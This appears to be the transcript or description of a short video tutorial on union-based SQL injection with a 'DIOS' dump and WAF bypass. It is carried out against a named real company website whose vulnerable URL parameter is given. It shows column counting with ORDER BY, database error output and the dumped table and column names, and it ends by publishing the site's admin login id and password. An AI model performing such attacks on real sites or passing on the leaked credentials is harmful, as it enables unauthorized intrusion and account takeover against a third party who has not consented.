Union Based SQLi Using DIOS and Simple WAF Bypassing

Usama Varikkottil · 61 views
Hey Everyone!
Usama Varikkottil Here :D


Union Based SQLi Using DIOS and Simple WAF Bypassing
+++++++++++++++++++++++++++++++++++++++++
site:http://www.professionalsystems.pk/products-list.php?cate=303&parent=1


Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/professi/public_html/products-list.php on line 139
/ AXIOS mAX Range


Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/professi/public_html/products-list.php on line 154

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/professi/public_html/products-list.php on

SQL Error

Error Fixed By Adding SQL Comment

Counting Number of Columns



ORDER+BY 4 --- no error
ORDER+BY 5 ----error


so 4 columns are there

Now find Vulnerable Column


WAF

Bypass it
Bypassed!!!
Vulnerable column is 2


Now Use Dios ;)


table names
--------
admin
categories
products
etc ,etc......


:D :D

Find COlumn Names from the Table Admin


columns from the table "admin"
++++++++++++

admin_id

fname
etc,etc.....


Login id and password


admin---login_id
psys2000---password
Thanks For Watching



Within 2 minutes we can do sqli ;)


Bye

Subscribe My channel
:P :D